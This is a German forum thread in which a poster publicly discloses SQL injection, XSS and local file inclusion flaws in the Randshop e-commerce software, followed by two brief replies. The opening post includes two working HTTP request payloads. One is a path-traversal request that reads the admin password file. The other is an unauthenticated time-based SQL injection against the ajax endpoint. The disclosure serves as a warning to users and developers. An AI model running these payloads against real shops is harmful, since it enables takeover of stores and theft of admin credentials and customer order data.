Schwachstellen in Randshop

Dieses Forum wird über die aktuellen Gesetzesänderungen informieren, worüber gerne geredet werden darf.

Moderatoren: Magnus, mmaass, ablass

Schwachstellen in Randshop

Beitragvon fulldisclosure » Di 27. Feb 2024, 16:28

Hallo liebe ForenmitgliederInnen,

ich möchte heute über einige ernsthafte Schwachstellen in Randshop berichten, die meiner Meinung nach dringend behoben werden müssen. Es handelt sich um mehrere SQL-Injection, Cross-Site Scripting und Local-File Inclusion Schwachstellen. Besonders alarmierend ist, dass die Local-File Inclusion zur Remote Code Execution erweitert werden kann.

Durch diese Schwachstellen können Angreifer beliebige Befehle auf dem System ausführen und den gesamten Shop übernehmen. Zudem können sie weitere sensible Konfigurationsdateien, inklusive Zugangsdaten zum Adminbereich und den Datenbanken, auslesen. Diese Sicherheitslücken sind extrem gefährlich und können verheerende Auswirkungen haben.

Es ist erschreckend zu sehen, dass diese Schwachstellen bisher nicht behoben wurden. Es ist dringend erforderlich, dass die Entwickler dieser Shopsoftware umgehend Maßnahmen ergreifen, um die Sicherheit der Software zu verbessern und die Privatsphäre der Benutzer zu gewährleisten.

Ich appelliere daher an die Verantwortlichen, sich der Ernsthaftigkeit dieser Situation bewusst zu werden und unverzüglich geeignete Maßnahmen zu ergreifen. Es ist wichtig, dass Sicherheitslücken schnellstmöglich geschlossen werden, um potenzielle Angriffe zu verhindern.

Die Local-File Inclusion befindet sich im Endpunkt "/templates/standard_2020/mail_html/index.php".
Durch den Paramter "content_file" können beliebige Pfade angegeben werden, welche durch "include_once" eingebunden werden.

Code: Alles auswählen
        POST /templates/standard_2020/mail_html/index.php HTTP/1.1
        Host: localhost
        Content-Type: application/x-www-form-urlencoded

        content_file=../../../admin/data/.passwd&tpl_betreiber_firma=&logo_image=&csspfad=char&tpl_betriber_ort=&tpl_betreiber_geschaeftsfuehrer=&headline= 


Beispielsweise liest der oben genannte Request die Adminzugangsdaten aus.

Cross-Site Scripting Schwachstellen gibt es quasi überall. Ebenso SQL-Injection Schwachstellen. Beispielhaft ist eine der SQL-Injection Schwachstellen gezeigt, welche sich unauthentifiziert ausnutzen lässt.

Code: Alles auswählen
        POST /ajax/dataexchange.php HTTP/1.1
        Host: localhost
        Content-Type: application/x-www-form-urlencoded

        formaction=get_table_information&table_name=mail_log.%2a%20from%20randshop_mail_log%20WHERE%209452=9452%20AND%20(SELECT%208709%20FROM%20(SELECT(SLEEP(5)))MvQD)--%20KknR--%20-&fieldtype=&treeelement_id_array=       


Hierdurch kann die Datenbank inklusive der "user"-Tabelle sowie Bestellinformationen ausgelesen werden.

Ich möchte dringend davon abraten, die Shopsoftware aufgrund schwerwiegender Sicherheitslücken zu verwenden. Bitte suchen Sie zeitnah nach einer Alternative, solange keine Updates für die Schwachstellen existieren.

Vielen Dank für eure Aufmerksamkeit und hoffentlich werden diese Sicherheitslücken bald behoben.
fulldisclosure
 
Beiträge: 1
Registriert: Fr 23. Feb 2024, 14:42

Re: Schwachstellen in Randshop

Beitragvon Werner » Di 26. Mär 2024, 21:48

Hallo,

interessant!
Es erhebt sich für mich die Frage, warum sowas noch niemandem sonst aufgefallen ist??!!
Werner
 
Beiträge: 294
Registriert: Mi 22. Jun 2011, 13:18

Re: Schwachstellen in Randshop

Beitragvon Pseiko » Do 28. Mär 2024, 05:55

Hoffentlich kommen die hier angepriesenen https://www.myrandshop.de/ Sicherheitsupdates bald!!
Pseiko
 
Beiträge: 348
Registriert: Sa 5. Jan 2008, 20:17


Zurück zu Recht und Gesetz / Hinweise, Tipps

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 9 Gäste